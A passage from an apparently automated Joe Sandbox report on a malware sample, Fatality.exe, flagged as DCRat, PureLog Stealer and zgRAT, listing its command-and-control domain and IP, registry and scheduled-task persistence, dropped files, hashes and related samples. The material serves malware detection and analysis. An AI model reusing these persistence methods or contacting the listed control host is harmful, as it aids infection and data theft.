                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgWebCacheV01.dat.8.drfalse
                              • URL Reputation: safe
                              unknown
                              https://deff.nelreports.net/api/report?cat=msnWebCacheV01.dat.8.dr, V01.log.8.drfalse
                              • URL Reputation: safe
                              unknown
                              http://373292cm.nyP2EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.ecosia.org/newtab/EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • URL Reputation: safe
                              unknown
                              https://ac.ecosia.org/autocomplete?q=EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • URL Reputation: safe
                              unknown
                              https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELWebCacheV01.dat.8.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://aefd.nelreports.net/api/report?cat=bingaotWebCacheV01.dat.8.drfalse
                              • URL Reputation: safe
                              unknown
                              http://373292cm.nyashka.topEoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platWebCacheV01.dat.8.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchEoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • URL Reputation: safe
                              unknown
                              http://373292cm.nyPEoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://373292cm.nyashka.top/EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://aefd.nelreports.net/api/report?cat=bingrmsWebCacheV01.dat.8.drfalse
                              • URL Reputation: safe
                              unknown
                              http://www.enigmaprotector.com/Fatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBridgeInto.exe, 00000006.00000002.2336699470.000000000373F000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • URL Reputation: safe
                              unknown
                              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&WebCacheV01.dat.8.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              IP:80.211.144.156
                              Domain:373292cm.nyashka.top
                              Country:Italy
                              ASN:31034
                              ASN Name:ARUBA-ASNIT
                              Malicious:true
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1498676
                              Start date and time:2024-08-25 15:42:10 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 30s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:46
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Fatality.exe
                              Detection:MAL
                              Classification:mal100.spre.troj.spyw.expl.evad.winEXE@53/59@1/1
                              EGA Information:
                              • Successful, ratio: 37.5%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): WinStore.App.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target BridgeInto.exe, PID 4972 because it is empty
                              • Execution Graph export aborted for target BridgeInto.exe, PID 6904 because it is empty
                              • Execution Graph export aborted for target EoNanmDGxPEtougVgAjHLx.exe, PID 6928 because it is empty
                              • Execution Graph export aborted for target dllhost.exe, PID 4324 because it is empty
                              • Execution Graph export aborted for target dllhost.exe, PID 884 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              TimeTypeDescription
                              09:43:01API Interceptor3x Sleep call for process: dllhost.exe modified
                              09:43:30API Interceptor284268x Sleep call for process: EoNanmDGxPEtougVgAjHLx.exe modified
                              15:43:22Task SchedulerRun new task: EoNanmDGxPEtougVgAjHLx path: "C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe"
                              15:43:22Task SchedulerRun new task: EoNanmDGxPEtougVgAjHLxE path: "C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe"
                              15:43:24Task SchedulerRun new task: BridgeInto path: "C:\Bridgemonitor\BridgeInto.exe"
                              15:43:24Task SchedulerRun new task: BridgeIntoB path: "C:\Bridgemonitor\BridgeInto.exe"
                              15:43:25Task SchedulerRun new task: dllhost path: "C:\Recovery\dllhost.exe"
                              15:43:25Task SchedulerRun new task: dllhostd path: "C:\Recovery\dllhost.exe"
                              15:43:25Task SchedulerRun new task: WinStore.App path: "C:\Users\All Users\ssh\WinStore.App.exe"
                              15:43:25Task SchedulerRun new task: WinStore.AppW path: "C:\Users\All Users\ssh\WinStore.App.exe"
                              15:43:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLx "C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe"
                              15:43:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Recovery\dllhost.exe"
                              15:43:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WinStore.App "C:\Users\All Users\ssh\WinStore.App.exe"
                              15:43:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BridgeInto "C:\Bridgemonitor\BridgeInto.exe"
                              15:43:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLx "C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe"
                              15:44:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Recovery\dllhost.exe"
                              15:44:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WinStore.App "C:\Users\All Users\ssh\WinStore.App.exe"
                              15:44:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BridgeInto "C:\Bridgemonitor\BridgeInto.exe"
                              15:44:30AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLx "C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe"
                              15:44:39AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Recovery\dllhost.exe"
                              15:44:47AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WinStore.App "C:\Users\All Users\ssh\WinStore.App.exe"
                              15:44:55AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run BridgeInto "C:\Bridgemonitor\BridgeInto.exe"
                              15:45:12AutostartRun: WinLogon Shell "C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe"
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              80.211.144.156SpotifyStartupTask.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 973800cm.nyashsens.top/SecureBigloadServerDefaulttestdlepublic.php
                              SpotifyStartupTask2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 572335cm.n9sh.top/CpuserverAsyncuniversal.php
                              BxV2vsnP6f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • fizika.top/vmphp_geoUpdateProtectBasecdn.php
                              loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 782652cm.n9sh.top/providerImageProcessorGeneratorwp.php
                              MIDNIGHT.exeGet hashmaliciousDCRat, PureLog Stealer, XWorm, zgRATBrowse
                              • 782652cm.n9sh.top/providerImageProcessorGeneratorwp.php
                              b5d8kjYEBH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 951499cm.nyashtech.top/sqlcentralUploads.php
                              cBEWDhqv1r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 389075cm.n9sh.top/tolowProcessserverwindowsFlowertesttrackWpUploads.php
                              A6CuqcjdpG.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 951499cm.nyashtech.top/sqlcentralUploads.php
                              79khRJMBK9.exeGet hashmaliciousDCRatBrowse
                              • volki.top/CpuLongpolltrackDatalifeCdnuploads.php
                              EQ1VCbEIkT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 951499cm.nyashtech.top/sqlcentralUploads.php
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              373292cm.nyashka.topjW5TA1J9Z1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ARUBA-ASNITSpotifyStartupTask.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              SpotifyStartupTask2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              BxV2vsnP6f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              MIDNIGHT.exeGet hashmaliciousDCRat, PureLog Stealer, XWorm, zgRATBrowse
                              • 80.211.144.156
                              b5d8kjYEBH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              cBEWDhqv1r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              A6CuqcjdpG.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              79khRJMBK9.exeGet hashmaliciousDCRatBrowse
                              • 80.211.144.156
                              EQ1VCbEIkT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exejW5TA1J9Z1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                C:\Bridgemonitor\BridgeInto.exejW5TA1J9Z1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exejW5TA1J9Z1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    Process:C:\Users\user\Desktop\Fatality.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1960448
                                    Entropy (8bit):7.550221219335871
                                    Encrypted:false
                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Bridgemonitor\BridgeInto.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Bridgemonitor\BridgeInto.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 100%
                                    Joe Sandbox View:
                                    • Filename: jW5TA1J9Z1.exe, Detection: malicious, Browse
                                    Process:C:\Users\user\Desktop\Fatality.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):218
                                    Entropy (8bit):5.814735904120153
                                    Encrypted:false
                                    SSDEEP:6:GUwqK+NkLzWbHOurFnBaORbM5nCkrks8UYKlgb9yCWs:GlMCzWLOuhBaORbQC0k9Kle9j1
                                    MD5:C357572C3DE6050797F8A3150D960522
                                    SHA1:E155A9DB0DA12E9E0CB217C9D679EF69B7906F02
                                    SHA-256:4CBA4AA1CA865472EC087DF4680B5098F215E0377B7B46AAB0223A585E956831
                                    SHA-512:6F35DA26DD64BC62673651316E946ECE4EDBABA308B2ECC6240BA719ED57A895CBE46668870DA0FE04BB29797C0395E4485BC93294D148A3AE8FFC4D5C4E8CA9
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with very long lines (372), with no line terminators
                                    Category:dropped
                                    Size (bytes):372
                                    Entropy (8bit):5.831570614297622
                                    Encrypted:false
                                    SSDEEP:6:2LyZdl8DiCElND2zQ82jrmS3YGKm4NEKCWogKzeINyEHN6mPYny9O1rbYNOGYHky:tB8DinlgzQ1XmS3YGDoggKSOLt6mPYy+
                                    MD5:BC64320441BF6A8A9D6DDFBDF9D3706F
                                    SHA1:00D01F4EDDFA7E852942E56ADEB782BE6A781E79
                                    SHA-256:3FB1C58F04FF79304B863B8B1D48578924627776164375AA0E148523B070A0C0
                                    SHA-512:042CB6B79BBA95436C5A8ADF17759A06E51B28BF36C88436FEAFACACFFFE9AEFC69F39C17EC6C3D98680BD682C1B48CFDFAA416D0501191ED495EECCC567DAEB
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\Fatality.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):76
                                    Entropy (8bit):4.903993757030197
                                    Encrypted:false
                                    SSDEEP:3:ZIUXvMKAjn34cKXKXACJl3pOCUn:ZIUXvYj31MKwunUn
                                    MD5:A7FA89383504A3BAD95435CD5195F415
                                    SHA1:EE31971BF35C38A6E37E8017CF221BDE55224DB9
                                    SHA-256:39258C93ECEA054B48C5713407938AA5358BE3BA254D935DE85A9533169BB7E4
                                    SHA-512:E97408A8F63ED08ED4DEDBBA7D75168D777A6444B7F019D47419500BDA4DB39DDA3AF11FD3FE872BDE6EF2EC551031C986F6438B576CF96BCEF7269FFBFF437A
                                    Malicious:false
                                    Preview:%QyWmIPI%%dcfjV%..%LgOXrjGHe%"C:\Bridgemonitor/BridgeInto.exe"%wCjQoMXCWgth%
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1960448
                                    Entropy (8bit):7.550221219335871
                                    Encrypted:false
                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 100%
                                    Joe Sandbox View:
                                    • Filename: jW5TA1J9Z1.exe, Detection: malicious, Browse
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with very long lines (550), with no line terminators
                                    Category:dropped
                                    Size (bytes):550
                                    Entropy (8bit):5.874364787486939
                                    Encrypted:false
                                    SSDEEP:12:2hLnSJs3VhmFHzo2QGOQm+DAXAuddjx5YbdP:2hLhg3iQm+sXzx5wdP
                                    MD5:67F2A7283BB1C99CB08163F5658A5590
                                    SHA1:3D8D0EC6ED8AB1D4E4B10C79E93C98E6FEFF5A61
                                    SHA-256:1C42E0D99CAB66D77F02EEDFD21722DE4B71D935A8FE9BDB3485E7E6389B8D64
                                    SHA-512:35FAEDC9AEEE994CDD2E3A67B806CD1E58344302CE23CDEE2263BE55C1539596C7AA634E551AD797DA45587FC219A9C933AA537E71C34ACC6BB8DFDA34A6B961
                                    Malicious:false
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):1168
                                    Entropy (8bit):4.448520842480604
                                    Encrypted:false
                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                    Malicious:false
                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):4608
                                    Entropy (8bit):3.952055895406107
                                    Encrypted:false
                                    SSDEEP:48:60mBthxZ8RxeOAkFJOcV4MKe28dSdavqBHbuulB+hnqXSfbNtm:q+xvxVx9nvkNTkZzNt
                                    MD5:C2508AC499BFFCF96118142555A728D5
                                    SHA1:64FD793DCBCACA02D82C406708A369AB477E2AED
                                    SHA-256:12933B0EFF24E660D06AB7B4D8DA96BBE1933A6399FDCDA288364F959E199709
                                    SHA-512:79AF619CBF7F37E4120012DD17B8ECA5C6BD03A4BB1A48A47501725BFEF960354FBC19F52E5A403EC608F362EB00FC0AC791F4D8676B94E80CF294F337F75A35
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1960448
                                    Entropy (8bit):7.550221219335871
                                    Encrypted:false
                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 100%
                                    Joe Sandbox View:
                                    • Filename: jW5TA1J9Z1.exe, Detection: malicious, Browse
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with very long lines (331), with no line terminators
                                    Category:dropped
                                    Size (bytes):331
                                    Entropy (8bit):5.798944965418842
                                    Encrypted:false
                                    SSDEEP:6:moew5/Nofuc83BEnk/CVSTs30961QCku4rgun+z4jXxAjiDaG4:mWFHunSCVms3K61QCkxgun+z4jBAp
                                    MD5:38B0C90397496340C5C76F94B05873D7
                                    SHA1:6A2D46F5B5B5ECE290C7F5FC9B0D6BF44E66F8ED
                                    SHA-256:64636590BED985D39C69FDC3DC0FE5145FAA223F46E489719986FE2827D0A727
                                    SHA-512:7C4ADF11B04926A4FEC38304CCADBCCD6E0A995371EF3DA1DE1D0C8A1D2FD182CD4CED23FFBD3CB22DC803D82D5EE7847AA2A333F1B43F67C046F3E4B7FDE25E
                                    Malicious:false
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1960448
                                    Entropy (8bit):7.550221219335871
                                    Encrypted:false
                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\ssh\WinStore.App.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\ssh\WinStore.App.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 100%
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with very long lines (361), with no line terminators
                                    Category:dropped
                                    Size (bytes):361
                                    Entropy (8bit):5.816333808799416
                                    Encrypted:false
                                    SSDEEP:6:KlqKjVDD28cjjpWAdZJJCxVNS4qphxk+IqDdRE25NDIC3iIJ8fafhpZp1:KlqKjo5jIAbCnubk+IOvXjiIJ8SJpZD
                                    MD5:09E2BB26D33E2E29FE725C8EE920C956
                                    SHA1:7D0CFF950DD797C01CB8B1E0067512E5801D90B5
                                    SHA-256:E7E16A5F7E41DCC230038D249F5A1114F074E21D2DC39F2FF8AC8953F6D1E2BD
                                    SHA-512:C2361ED20AE7D9980806204BB2346A17ED0C7A80804C1DC34CA0C02A2AA5243EE51777A25CFB19B73D4C59AD0B4F7144D926BC15C5ED75B1F67AD94705DF2773
                                    Malicious:false
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with very long lines (946), with no line terminators
                                    Category:dropped
                                    Size (bytes):946
                                    Entropy (8bit):5.907965904098634
                                    Encrypted:false
                                    SSDEEP:24:AbUdjqUkfWZv39wYEj8mkE4P5Oeqdrw0Cu:AGqVWZ6t7ZwqdrDCu
                                    MD5:79624B68360DFA3C83A5C653D57EEA06
                                    SHA1:88AC3DD4B50C679944E9928F841DA6CD7D829AF5
                                    SHA-256:765CFD1ACFDF6E2F54C06040F84A2B5E9D7CFC664AF5881ECBDC462071EC66A4
                                    SHA-512:463080B62426409DC24DB18C7DB726C952B72EE61926704CE3CC6A153F83C70063CAF735AE67D18D3562943BAB1378D114A0AE43DF5927F93B1C92ACC343802A
                                    Malicious:false
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1960448
                                    Entropy (8bit):7.550221219335871
                                    Encrypted:false
                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 100%
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with very long lines (961), with no line terminators
                                    Category:dropped
                                    Size (bytes):961
                                    Entropy (8bit):5.907879622611825
                                    Encrypted:false
                                    SSDEEP:24:P1qTNZNcTxrJiaaPlEuc6PHnfqFqVgM77DJa:PgfOTtAaeEuc6PHSq6EJa
                                    MD5:4A0B3DB5352280C77B4C6EA30CA11F94
                                    SHA1:ACF8B1660EBDD4DEC5C5F51DD2B0542E16E8DE9E
                                    SHA-256:14B8A05C57B25983938932FE5E2098FC456F69F9CDB94655D513F163B4D711A3
                                    SHA-512:6882725D5278E43B04FD4AC8CD1C0808C490D4DCE31FC61D0BD86711CB6180C8496E0A5B87AB83DA6F7AF048840E4034CF5D054D2CDE10C919E93E6220EAD4D3
                                    Malicious:false
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1960448
                                    Entropy (8bit):7.550221219335871
                                    Encrypted:false
